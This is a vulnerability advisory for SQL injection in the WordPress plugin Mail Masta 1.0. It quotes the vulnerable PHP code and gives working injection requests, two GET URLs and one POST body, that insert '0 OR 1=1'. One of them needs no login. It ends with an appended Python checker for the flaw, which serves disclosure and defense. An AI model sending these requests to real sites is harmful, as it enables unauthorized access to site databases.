Source: seebug (www.seebug.org), reported by Anonymous, SSV:92735
Published: Mar 06, 2017 - 12:00 a.m.

WordPress Plugin Mail Masta 1.0 - SQL Injection

EPSS: 0.006 (Low), percentile 78.5%

Vulnerability information

Vulnerability title: WordPress Plugin Mail Masta 1.0 - SQL Injection

Plugin home page: https://wpcore.com/plugin/mail-masta

Vulnerability type: SQL injection

CVE: CVE-2017-6095, CVE-2017-6096, CVE-2017-6097, CVE-2017-6098

Vulnerability analysis

The first injection

Vulnerable file (no authentication required):

./wp-content/plugins/mail-masta/inc/lists/csvexport.php

Vulnerable parameter: list_id

http://my_wp_app/wp-content/plugins/mail-masta/inc/lists/csvexport.php?list_id=0+OR+1%3D1&pl=/var/www/html/wordpress/wp-load.php

Let's first look at csvexport.php:

$list_id=$_GET['list_id'];
global $wpdb;
$mail_subscribers = $wpdb->prefix . "masta_subscribers";
$masta_list = $wpdb->prefix . "masta_list";
$check_sql = "SELECT * FROM $mail_subscribers WHERE list_id = $list_id";
$check_list="SELECT * FROM $masta_list WHERE list_id= $list_id";
$wp_list=$wpdb->get_results($check_sql);
$wp_list_s=$wpdb->get_results($check_list);

The list_id value is placed into the SQL statement without any filtering, which results in the vulnerability.

The second injection

Vulnerable file (requires a WordPress administrator):

./wp-content/plugins/mail-masta/inc/lists/view-list.php

Vulnerable parameter: filter_list

http://my_wp_app/wp-admin/admin.php?page=masta-lists&action=view_list&filter_list=0+OR+1%3D1

Let's look at view-list.php:

global $wpdb;
$list_id = $_GET['filter_list'];
$masta_list = $wpdb->prefix . "masta_list";
$masta_subscribers = $wpdb->prefix . "masta_subscribers";
$listdata = $wpdb->get_results( $wpdb->prepare("SELECT * FROM $masta_list WHERE list_id= $list_id",$query));
$list_subscribers = $wpdb->get_var( $wpdb->prepare("SELECT COUNT( `list_id` ) FROM $masta_subscribers WHERE list_id= $list_id AND status=1",$query));

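As in the first case, the value is used without any filtering: $wpdb->prepare() is called, but $list_id is already interpolated into the query string and the query contains no placeholder.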

The third injection

Vulnerable location: requires a WordPress administrator

This is a POST injection

Vulnerable parameter: list_id

First, let's look at campaign_save.php:

$list_id=$_POST['list_id'];
$check_list = $wpdb->get_var("SELECT count(id) FROM wp_masta_subscribers where list_id=$list_id");

No filtering is applied here either; the injection is delivered via POST:

POST /wp-admin/admin-ajax.php?id= HTTP/1.1

...snip...

action=my_action&url=%2Fvar%2Fwww%2Fhtml%2Fwp-content%2Fplugins%2Fmail-masta%2Finc%2Fcampaign_save.php&sender_selected_list_check=check&list_id=1+OR+1%3D1
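
A static check for the pattern shared by all three injections above, added here as an example (it is not part of the original advisory or the plugin's code): request data reaching the SQL text passed to a $wpdb call, including prepare() called without a placeholder. The `scan` function, its regex heuristics and the `HARDENED` snippet are assumptions made for illustration; only double-quoted literals and plain variables as the first argument are handled.

```python
import re

SOURCE = re.compile(r'\$_(?:GET|POST|REQUEST|COOKIE)\b')
SANITIZER = re.compile(r'\b(?:absint|intval)\s*\(|\(int\)')
ASSIGN = re.compile(r'^\s*(\$\w+)\s*=(?!=)\s*(.*)$')
VAR = re.compile(r'\$\w+')
PLACEHOLDER = re.compile(r'%(?:\d+\$)?[dsf]')
# A $wpdb query call whose first argument is a double-quoted literal or a plain variable.
CALL = re.compile(r'\$wpdb->(prepare|get_results|get_var|get_row|get_col|query)'
                  r'\(\s*(?:"((?:[^"\\]|\\.)*)"|(\$(?!wpdb\b)\w+))')

def scan(php):
    """Return (line, method, tainted_vars, note) where request data reaches SQL text."""
    tainted, findings = set(), []
    for n, line in enumerate(php.splitlines(), 1):
        for m in CALL.finditer(line):
            method, literal, var = m.groups()
            used = [var] if var else VAR.findall(literal)
            bad = sorted(v for v in set(used) if v in tainted)
            if bad:
                note = "request data in SQL text"
                if method == "prepare" and literal and not PLACEHOLDER.search(literal):
                    note += "; prepare() has no placeholder"
                findings.append((n, method, bad, note))
        a = ASSIGN.match(line)
        if a:  # propagate taint through plain assignments and string building
            name, rhs = a.groups()
            dirty = SOURCE.search(rhs) or any(v in tainted for v in VAR.findall(rhs))
            if dirty and not SANITIZER.search(rhs) and not CALL.search(rhs):
                tainted.add(name)
            else:
                tainted.discard(name)
    return findings

# The three patterns quoted in this advisory, reduced to the relevant lines.
CSVEXPORT = '''$list_id=$_GET['list_id'];
$check_sql = "SELECT * FROM $mail_subscribers WHERE list_id = $list_id";
$wp_list=$wpdb->get_results($check_sql);'''
VIEW_LIST = '''$list_id = $_GET['filter_list'];
$listdata = $wpdb->get_results( $wpdb->prepare("SELECT * FROM $masta_list WHERE list_id= $list_id",$query));'''
CAMPAIGN_SAVE = '''$list_id=$_POST['list_id'];
$check_list = $wpdb->get_var("SELECT count(id) FROM wp_masta_subscribers where list_id=$list_id");'''
# Constructed hardened form (not the vendor's patch): integer cast plus a bound %d placeholder.
HARDENED = '''$list_id = absint($_GET['filter_list']);
$listdata = $wpdb->get_results($wpdb->prepare("SELECT * FROM $masta_list WHERE list_id = %d", $list_id));'''

if __name__ == "__main__":
    for name in ("CSVEXPORT", "VIEW_LIST", "CAMPAIGN_SAVE", "HARDENED"):
        print(name, scan(globals()[name]))
```

The check is a line-based heuristic for code review, not a PHP parser: it misses queries split across lines and taint that flows through function calls.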